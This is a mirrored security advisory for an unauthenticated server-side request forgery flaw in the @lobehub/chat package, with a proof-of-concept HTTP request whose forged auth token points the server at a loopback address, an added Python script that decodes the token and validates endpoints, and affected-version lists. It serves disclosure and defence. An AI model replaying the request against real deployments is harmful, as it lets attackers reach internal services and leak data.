Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS0yeGNjLXZtM2YtbThyd84ABByj

@lobehub/chat Server Side Request Forgery vulnerability

Summary

lobe-chat before 1.19.13 has an unauthenticated SSRF vulnerability. An attacker can construct malicious requests that cause SSRF without logging in, reach intranet services, and leak sensitive information.

Details

The JWT carried in the X-Lobe-Chat-Auth header stores the proxy endpoint address and the OpenAI API key. Because the server uses this client-supplied endpoint, the header can be modified to make the target lobe-chat deployment issue requests into its internal network.


PoC

POST /api/chat/openai HTTP/2
Host: chat-preview.lobehub.com
Cookie: LOBE_LOCALE=zh-CN; LOBE_THEME_PRIMARY_COLOR=undefined; LOBE_THEME_NEUTRAL_COLOR=undefined; _ga=GA1.1.86608329.1711346216; _ga_63LP1TV70T=GS1.1.1711346215.1.1.1711346244.0.0.0
Content-Length: 158
Sec-Ch-Ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
X-Lobe-Chat-Auth: eyJhbGciOiJIUzI1NiJ9.eyJhY2Nlc3NDb2RlIjoiIiwiYXBpS2V5IjoiMSIsImVuZHBvaW50IjoiaHR0cDovLzEyNy4wLjAuMS54aXAuaW86MzIxMCIsImlhdCI6MTcxMTM0NjI1MCwiZXhwIjoxNzExMzQ2MzUwfQ.ZZ3v3q9T8E6llOVGOA3ep5OSVoFEawswEfKtufCcwL4
Content-Type: application/json
X-Lobe-Trace: eyJlbmFibGVkIjpmYWxzZX0=
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://chat-preview.lobehub.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://chat-preview.lobehub.com/settings/llm
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7
Connection: close

{"model":"gpt-3.5-turbo","stream":true,"frequency_penalty":0,"presence_penalty":0,"temperature":0.6,"top_p":1,"messages":[{"content":"hello","role":"user"}]}
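The request above carries the upstream endpoint inside a client-controlled JWT, and the hostname in it (127.0.0.1.xip.io) resolves to loopback, which is why a check on the hostname string alone is not enough. As an added example that is not part of the advisory or of lobe-chat's own code, the following Python script decodes that header's payload for triage (the signature is not verified) and shows the server-side validation a proxy of this kind needs: http(s) only, no embedded credentials, and every address the host resolves to must be globally routable. DNS is replaced by a constructed in-memory stub so the script runs offline; `STUB_DNS`, `endpoint_is_safe` and `inspect_auth_header` are this example's own names, and the public address in the stub is made up.

```python
import base64
import ipaddress
import json
from typing import Callable, Dict, List, Tuple
from urllib.parse import urlsplit

# X-Lobe-Chat-Auth value from the advisory's PoC request, copied from the page.
POC_AUTH_HEADER = "eyJhbGciOiJIUzI1NiJ9.eyJhY2Nlc3NDb2RlIjoiIiwiYXBpS2V5IjoiMSIsImVuZHBvaW50IjoiaHR0cDovLzEyNy4wLjAuMS54aXAuaW86MzIxMCIsImlhdCI6MTcxMTM0NjI1MCwiZXhwIjoxNzExMzQ2MzUwfQ.ZZ3v3q9T8E6llOVGOA3ep5OSVoFEawswEfKtufCcwL4"

Resolver = Callable[[str], List[str]]

# Constructed, in-memory stand-in for DNS so the script runs offline. The first
# entry mirrors the PoC: a public-looking hostname that resolves to loopback.
STUB_DNS: Dict[str, List[str]] = {
    "127.0.0.1.xip.io": ["127.0.0.1"],
    "api.openai.com": ["104.18.6.192"],   # constructed public address
    "intranet.example": ["10.20.30.40"],  # constructed private address
}


def stub_resolve(host: str) -> List[str]:
    return STUB_DNS.get(host, [])


def _b64url_decode(segment: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_auth_payload(header_value: str) -> dict:
    """Return the claims of the JWT carried in X-Lobe-Chat-Auth.

    The signature is NOT verified: this is for triage (a WAF rule or log
    review), not for trusting the claims. The advisory's point is that the
    server acts on the `endpoint` claim without authenticating the caller.
    """
    parts = header_value.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS (expected header.payload.signature)")
    return json.loads(_b64url_decode(parts[1]))


def endpoint_is_safe(endpoint: str, resolve: Resolver = stub_resolve) -> Tuple[bool, str]:
    """Decide whether a client-supplied upstream URL may be proxied.

    Allowed only if the scheme is http(s), no credentials are embedded, and
    every address the host resolves to is globally routable (no loopback,
    private, link-local or reserved ranges).
    """
    try:
        parts = urlsplit(endpoint)
        host = parts.hostname
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials embedded in URL"
    try:
        addrs = [ipaddress.ip_address(host)]  # literal IP: no lookup needed
    except ValueError:
        resolved = resolve(host)
        if not resolved:
            return False, f"host {host!r} did not resolve"
        addrs = [ipaddress.ip_address(a) for a in resolved]
    for addr in addrs:
        if not addr.is_global:
            return False, f"host {host!r} resolves to non-global address {addr}"
    return True, "ok"


def inspect_auth_header(header_value: str, resolve: Resolver = stub_resolve) -> dict:
    """Decode the header and assess the endpoint it carries."""
    try:
        claims = decode_auth_payload(header_value)
    except ValueError as exc:  # also covers binascii.Error and JSONDecodeError
        return {"ssrf_risk": True, "reason": f"malformed header: {exc}"}
    endpoint = claims.get("endpoint")
    if not endpoint:
        return {"ssrf_risk": False, "reason": "no custom endpoint claim"}
    ok, reason = endpoint_is_safe(endpoint, resolve)
    return {"ssrf_risk": not ok, "endpoint": endpoint, "reason": reason}


if __name__ == "__main__":
    print(inspect_auth_header(POC_AUTH_HEADER))
```

In a real deployment the resolver would be the system DNS and the check would be applied to every returned address, with the connection then made to the validated address rather than re-resolving the name; the endpoint check also does not replace authenticating the caller, which is the root cause the advisory describes.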

Impact

SSRF; all users of affected versions are impacted.

Permalink: https://github.com/advisories/GHSA-2xcc-vm3f-m8rw
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yeGNjLXZtM2YtbThyd84ABByj
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 15 days ago
Updated: 14 days ago


CVSS Score: 8.1
CVSS vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:L

EPSS Percentage: 0.00043
EPSS Percentile: 0.10511

Identifiers: GHSA-2xcc-vm3f-m8rw, CVE-2024-32965
References: Repository: https://github.com/lobehub/lobe-chat
Blast Radius: 1.0

Affected Packages

npm:@lobehub/chat
Dependent packages: 0
Dependent repositories: 0
Downloads: 30,260 last month
Affected Version Ranges: < 1.19.13
Fixed in: 1.19.13
All affected versions: 0.1.6, 0.2.0, 0.3.0, 0.4.0, 0.4.1, 0.4.2, 0.4.3, 0.5.0, 0.6.0, 0.6.1, 0.7.0, 0.8.0, 0.8.1, 0.8.2, 0.9.0, 0.10.0, 0.10.1, 0.10.2, 0.11.0, 0.12.0, 0.12.1, 0.13.0, 0.13.1, 0.14.0, 0.15.0, 0.15.1, 0.16.0, 0.16.1, 0.17.0, 0.18.0, 0.18.1, 0.18.2, 0.19.0, 0.20.0, 0.21.0, 0.22.0, 0.22.1, 0.22.2, 0.23.0, 0.24.0, 0.25.0, 0.26.0, 0.26.1, 0.27.0, 0.27.1, 0.27.2, 0.27.3, 0.27.4, 0.28.0, 0.29.0, 0.30.0, 0.30.1, 0.31.0, 0.32.0, 0.33.0, 0.34.0, 0.35.0, 0.35.1, 0.36.0, 0.36.1, 0.37.0, 0.38.0, 0.39.0, 0.39.1, 0.39.2, 0.39.3, 0.39.4, 0.40.0, 0.40.1, 0.40.2, 0.40.3, 0.40.4, 0.40.5, 0.40.6, 0.40.7, 0.41.0, 0.41.1, 0.41.2, 0.42.0, 0.42.1, 0.42.2, 0.42.3, 0.43.0, 0.44.0, 0.44.1, 0.44.2, 0.44.3, 0.44.4, 0.45.0, 0.46.0, 0.46.1, 0.47.0, 0.48.0, 0.49.0, 0.50.0, 0.51.0, 0.52.0, 0.52.1, 0.53.0, 0.54.0, 0.54.1, 0.54.2, 0.54.3, 0.54.4, 0.55.0, 0.55.1, 0.56.0, 0.57.0, 0.58.0, 0.59.0, 0.60.0, 0.60.1, 0.60.2, 0.60.3, 0.60.4, 0.61.0, 0.62.0, 0.62.1, 0.63.0, 0.63.1, 0.63.2, 0.63.3, 0.64.0, 0.64.1, 0.65.0, 0.65.1, 0.66.0, 0.67.0, 0.68.0, 0.68.1, 0.69.0, 0.69.1, 0.70.0, 0.70.1, 0.70.2, 0.70.3, 0.70.4, 0.71.0, 0.71.1, 0.72.0, 0.72.1, 0.72.2, 0.72.3, 0.72.4, 0.73.0, 0.74.0, 0.75.0, 0.76.0, 0.76.1, 0.76.2, 0.77.0, 0.77.1, 0.77.2, 0.78.0, 0.78.1, 0.79.0, 0.79.1, 0.79.2, 0.79.3, 0.79.4, 0.79.5, 0.79.6, 0.79.7, 0.79.8, 0.80.0, 0.80.1, 0.80.2, 0.81.0, 0.82.1, 0.82.2, 0.82.3, 0.82.4, 0.82.5, 0.82.6, 0.82.7, 0.82.8, 0.82.9, 0.83.0, 0.83.1, 0.83.2, 0.83.3, 0.83.4, 0.83.5, 0.83.6, 0.83.7, 0.83.8, 0.83.9, 0.83.10, 0.84.0, 0.85.0, 0.85.1, 0.85.2, 0.85.3, 0.86.0, 0.86.1, 0.86.2, 0.86.3, 0.86.4, 0.86.5, 0.87.0, 0.88.0, 0.89.0, 0.89.1, 0.89.2, 0.89.3, 0.89.4, 0.89.5, 0.89.6, 0.89.7, 0.89.8, 0.89.9, 0.89.10, 0.90.0, 0.90.1, 0.90.2, 0.90.3, 0.91.0, 0.92.0, 0.93.0, 0.94.0, 0.94.1, 0.94.2, 0.94.3, 0.94.4, 0.94.5, 0.95.0, 0.95.1, 0.96.0, 0.96.1, 0.96.2, 0.96.3, 0.96.4, 0.96.5, 0.96.6, 0.96.7, 0.96.8, 0.96.9, 0.97.0, 0.97.1, 0.98.0, 0.98.1, 0.98.2, 0.98.3, 0.99.0, 0.99.1, 0.100.0, 0.100.1, 0.100.2, 
0.100.3, 0.100.4, 0.100.5, 0.101.0, 0.101.1, 0.101.2, 0.101.3, 0.101.4, 0.101.5, 0.101.6, 0.101.7, 0.102.0, 0.102.1, 0.102.2, 0.102.3, 0.102.4, 0.103.0, 0.103.1, 0.104.0, 0.105.0, 0.105.1, 0.105.2, 0.106.0, 0.107.0, 0.107.1, 0.107.2, 0.107.3, 0.107.4, 0.107.5, 0.107.6, 0.107.7, 0.107.8, 0.107.9, 0.107.10, 0.107.11, 0.107.12, 0.107.13, 0.107.14, 0.107.15, 0.107.16, 0.108.0, 0.109.0, 0.109.1, 0.110.0, 0.110.1, 0.110.2, 0.110.3, 0.110.4, 0.110.5, 0.110.6, 0.110.7, 0.110.8, 0.110.9, 0.110.10, 0.111.0, 0.111.1, 0.111.2, 0.111.3, 0.111.4, 0.111.5, 0.111.6, 0.112.0, 0.112.1, 0.113.0, 0.113.1, 0.114.0, 0.114.1, 0.114.2, 0.114.3, 0.114.4, 0.114.5, 0.114.6, 0.114.7, 0.114.8, 0.114.9, 0.115.0, 0.115.1, 0.115.2, 0.115.3, 0.115.4, 0.115.5, 0.115.6, 0.115.7, 0.115.8, 0.115.9, 0.115.10, 0.115.11, 0.115.12, 0.115.13, 0.116.0, 0.116.1, 0.116.2, 0.116.3, 0.116.4, 0.116.5, 0.117.0, 0.117.1, 0.117.2, 0.117.3, 0.117.4, 0.117.5, 0.118.0, 0.118.1, 0.118.2, 0.118.3, 0.118.4, 0.118.5, 0.118.6, 0.118.7, 0.118.8, 0.118.9, 0.118.10, 0.119.0, 0.119.1, 0.119.2, 0.119.3, 0.119.4, 0.119.5, 0.119.6, 0.119.7, 0.119.8, 0.119.9, 0.119.10, 0.119.11, 0.119.12, 0.119.13, 0.120.0, 0.120.1, 0.120.2, 0.120.3, 0.120.4, 0.120.5, 0.120.6, 0.121.0, 0.121.1, 0.121.2, 0.121.3, 0.121.4, 0.122.0, 0.122.1, 0.122.2, 0.122.3, 0.122.4, 0.122.5, 0.122.6, 0.122.7, 0.122.8, 0.122.9, 0.123.0, 0.123.1, 0.123.2, 0.123.3, 0.123.4, 0.124.0, 0.124.1, 0.124.2, 0.124.3, 0.125.0, 0.126.0, 0.126.1, 0.126.2, 0.126.3, 0.126.4, 0.126.5, 0.127.0, 0.127.1, 0.127.2, 0.128.0, 0.128.1, 0.128.2, 0.128.3, 0.128.4, 0.128.5, 0.128.6, 0.128.7, 0.128.8, 0.128.9, 0.128.10, 0.129.0, 0.129.1, 0.129.2, 0.129.3, 0.129.4, 0.129.5, 0.129.6, 0.130.0, 0.130.1, 0.130.2, 0.130.3, 0.130.4, 0.130.5, 0.130.6, 0.130.7, 0.131.0, 0.132.0, 0.132.1, 0.132.2, 0.133.0, 0.133.1, 0.133.2, 0.133.3, 0.133.4, 0.133.5, 0.134.0, 0.134.1, 0.135.0, 0.135.1, 0.135.2, 0.135.3, 0.135.4, 0.136.0, 0.137.0, 0.138.0, 0.138.1, 0.138.2, 0.139.0, 0.139.1, 0.139.2, 0.140.0, 0.140.1, 
0.141.0, 0.141.1, 0.141.2, 0.142.0, 0.142.1, 0.142.2, 0.142.3, 0.142.4, 0.142.5, 0.142.6, 0.142.7, 0.142.8, 0.142.9, 0.143.0, 0.144.0, 0.144.1, 0.145.0, 0.145.1, 0.145.2, 0.145.3, 0.145.4, 0.145.5, 0.145.6, 0.145.7, 0.145.8, 0.145.9, 0.145.10, 0.145.11, 0.145.12, 0.145.13, 0.146.0, 0.146.1, 0.146.2, 0.147.0, 0.147.1, 0.147.2, 0.147.3, 0.147.4, 0.147.5, 0.147.6, 0.147.7, 0.147.8, 0.147.9, 0.147.10, 0.147.11, 0.147.12, 0.147.13, 0.147.14, 0.147.15, 0.147.16, 0.147.17, 0.147.18, 0.147.19, 0.147.20, 0.147.21, 0.147.22, 0.148.0, 0.148.1, 0.148.2, 0.148.3, 0.148.4, 0.148.5, 0.148.6, 0.148.7, 0.148.8, 0.148.9, 0.148.10, 0.149.0, 0.149.1, 0.149.2, 0.149.3, 0.149.4, 0.149.5, 0.149.6, 0.150.0, 0.150.1, 0.150.2, 0.150.3, 0.150.4, 0.150.5, 0.150.6, 0.150.7, 0.150.8, 0.150.9, 0.150.10, 0.151.0, 0.151.1, 0.151.2, 0.151.3, 0.151.4, 0.151.5, 0.151.6, 0.151.7, 0.151.8, 0.151.9, 0.151.10, 0.151.11, 0.152.0, 0.152.1, 0.152.2, 0.152.3, 0.152.4, 0.152.5, 0.152.6, 0.152.7, 0.152.8, 0.152.9, 0.152.10, 0.152.11, 0.152.12, 0.153.0, 0.153.1, 0.154.0, 0.154.1, 0.154.2, 0.154.3, 0.154.4, 0.154.5, 0.154.6, 0.154.7, 0.155.0, 0.155.1, 0.155.2, 0.155.3, 0.155.4, 0.155.5, 0.155.6, 0.155.7, 0.155.8, 0.155.9, 0.156.0, 0.156.1, 0.156.2, 0.157.0, 0.157.1, 0.157.2, 0.158.0, 0.158.1, 0.158.2, 0.159.0, 0.159.1, 0.159.2, 0.159.3, 0.159.4, 0.159.5, 0.159.6, 0.159.7, 0.159.8, 0.159.9, 0.159.10, 0.159.11, 0.159.12, 0.160.0, 0.160.1, 0.160.2, 0.160.3, 0.160.4, 0.160.5, 0.160.6, 0.160.7, 0.160.8, 0.161.0, 0.161.1, 0.161.2, 0.161.3, 0.161.4, 0.161.5, 0.161.6, 0.161.7, 0.161.8, 0.161.9, 0.161.10, 0.161.11, 0.161.12, 0.161.13, 0.161.14, 0.161.15, 0.161.16, 0.161.17, 0.161.18, 0.161.19, 0.161.20, 0.161.21, 0.161.22, 0.161.23, 0.161.24, 0.161.25, 0.162.0, 0.162.1, 0.162.2, 0.162.3, 0.162.4, 0.162.5, 0.162.6, 0.162.7, 0.162.8, 0.162.9, 0.162.10, 0.162.11, 0.162.12, 0.162.13, 0.162.14, 0.162.15, 0.162.16, 0.162.17, 0.162.18, 0.162.19, 0.162.20, 0.162.21, 0.162.22, 0.162.23, 0.162.24, 0.162.25, 0.163.0, 0.164.0, 
1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, 1.0.8, 1.0.9, 1.0.10, 1.0.11, 1.0.12, 1.0.13, 1.0.14, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.1.5, 1.1.6, 1.1.7, 1.1.8, 1.1.9, 1.1.10, 1.1.11, 1.1.12, 1.1.13, 1.1.14, 1.1.15, 1.1.16, 1.1.17, 1.1.18, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4, 1.2.5, 1.2.6, 1.2.7, 1.2.8, 1.2.9, 1.2.10, 1.2.11, 1.2.12, 1.2.13, 1.2.14, 1.3.0, 1.3.1, 1.3.2, 1.3.3, 1.3.4, 1.3.5, 1.3.6, 1.4.0, 1.4.1, 1.4.2, 1.4.3, 1.5.0, 1.5.1, 1.5.2, 1.5.3, 1.5.4, 1.5.5, 1.6.0, 1.6.1, 1.6.2, 1.6.3, 1.6.4, 1.6.5, 1.6.6, 1.6.7, 1.6.8, 1.6.9, 1.6.10, 1.6.11, 1.6.12, 1.6.13, 1.6.14, 1.6.15, 1.7.0, 1.7.1, 1.7.2, 1.7.3, 1.7.4, 1.7.5, 1.7.6, 1.7.7, 1.7.8, 1.7.9, 1.7.10, 1.8.0, 1.8.1, 1.8.2, 1.9.0, 1.9.1, 1.9.2, 1.9.3, 1.9.4, 1.9.5, 1.9.6, 1.9.7, 1.9.8, 1.10.0, 1.10.1, 1.11.0, 1.11.1, 1.11.2, 1.11.3, 1.11.4, 1.11.5, 1.11.6, 1.11.7, 1.11.8, 1.11.9, 1.12.0, 1.12.1, 1.12.2, 1.12.3, 1.12.4, 1.12.5, 1.12.6, 1.12.7, 1.12.8, 1.12.9, 1.12.10, 1.12.11, 1.12.12, 1.12.13, 1.12.14, 1.12.15, 1.12.16, 1.12.17, 1.12.18, 1.12.19, 1.12.20, 1.13.0, 1.13.1, 1.13.2, 1.14.0, 1.14.1, 1.14.2, 1.14.3, 1.14.4, 1.14.5, 1.14.6, 1.14.7, 1.14.8, 1.14.9, 1.14.10, 1.14.11, 1.14.12, 1.15.0, 1.15.1, 1.15.2, 1.15.3, 1.15.4, 1.15.5, 1.15.6, 1.15.7, 1.15.8, 1.15.9, 1.15.10, 1.15.11, 1.15.12, 1.15.13, 1.15.14, 1.15.15, 1.15.16, 1.15.17, 1.15.18, 1.15.19, 1.15.20, 1.15.21, 1.15.22, 1.15.23, 1.15.24, 1.15.25, 1.15.26, 1.15.27, 1.15.28, 1.15.29, 1.15.30, 1.15.31, 1.15.32, 1.15.33, 1.15.34, 1.15.35, 1.16.0, 1.16.1, 1.16.2, 1.16.3, 1.16.4, 1.16.5, 1.16.6, 1.16.7, 1.16.8, 1.16.9, 1.16.10, 1.16.11, 1.16.12, 1.16.13, 1.16.14, 1.17.0, 1.17.1, 1.17.2, 1.17.3, 1.17.4, 1.17.5, 1.17.6, 1.17.7, 1.18.0, 1.18.1, 1.18.2, 1.19.0, 1.19.1, 1.19.2, 1.19.3, 1.19.4, 1.19.5, 1.19.6, 1.19.7, 1.19.8, 1.19.9, 1.19.10, 1.19.11, 1.19.12
All unaffected versions: 1.19.13, 1.19.14, 1.19.15, 1.19.16, 1.19.17, 1.19.18, 1.19.19, 1.19.20, 1.19.21, 1.19.22, 1.19.23, 1.19.24, 1.19.25, 1.19.26, 1.19.27, 1.19.28, 1.19.29, 1.19.30, 1.19.31, 1.19.32, 1.19.33, 1.19.34, 1.19.35, 1.19.36, 1.20.0, 1.20.1, 1.20.2, 1.20.3, 1.20.4, 1.20.5, 1.20.6, 1.20.7, 1.20.8, 1.21.0, 1.21.1, 1.21.2, 1.21.3, 1.21.4, 1.21.5, 1.21.6, 1.21.7, 1.21.8, 1.21.9, 1.21.10, 1.21.11, 1.21.12, 1.21.13, 1.21.14, 1.21.15, 1.21.16, 1.22.0, 1.22.1, 1.22.2, 1.22.3, 1.22.4, 1.22.5, 1.22.6, 1.22.7, 1.22.8, 1.22.9, 1.22.10, 1.22.11, 1.22.12, 1.22.13, 1.22.14, 1.22.15, 1.22.16, 1.22.17, 1.22.18, 1.22.19, 1.22.20, 1.22.21, 1.22.22, 1.22.23, 1.22.24, 1.22.25, 1.22.26, 1.22.27, 1.23.0, 1.23.1, 1.24.0, 1.24.1, 1.24.2, 1.25.0, 1.25.1, 1.25.2, 1.25.3, 1.26.0, 1.26.1, 1.26.2, 1.26.3, 1.26.4, 1.26.5, 1.26.6, 1.26.7, 1.26.8, 1.26.9, 1.26.10, 1.26.11, 1.26.12, 1.26.13, 1.26.14, 1.26.15, 1.26.16, 1.26.17, 1.26.18, 1.26.19, 1.26.20, 1.26.21, 1.27.0, 1.27.1, 1.27.2, 1.27.3, 1.28.0, 1.28.1, 1.28.2, 1.28.3, 1.28.4, 1.28.5, 1.28.6, 1.29.0, 1.29.1, 1.29.2, 1.29.3, 1.29.4, 1.29.5, 1.29.6, 1.30.0, 1.31.0, 1.31.1, 1.31.2, 1.31.3, 1.31.4, 1.31.5, 1.31.6, 1.31.7, 1.31.8, 1.31.9, 1.31.10, 1.31.11, 1.32.0, 1.32.1, 1.32.2, 1.32.3, 1.32.4, 1.32.5, 1.32.6, 1.32.7, 1.32.8, 1.32.9, 1.33.0, 1.33.1, 1.33.2, 1.33.3, 1.33.4, 1.33.5, 1.34.0, 1.34.1, 1.34.2, 1.34.3, 1.34.4, 1.34.5, 1.34.6, 1.35.0, 1.35.1, 1.35.2, 1.35.3, 1.35.4, 1.35.5, 1.35.6, 1.35.7, 1.35.8, 1.35.9, 1.35.10, 1.35.11, 1.35.12, 1.35.13, 1.35.14, 1.36.0, 1.36.1, 1.36.2, 1.36.3, 1.36.4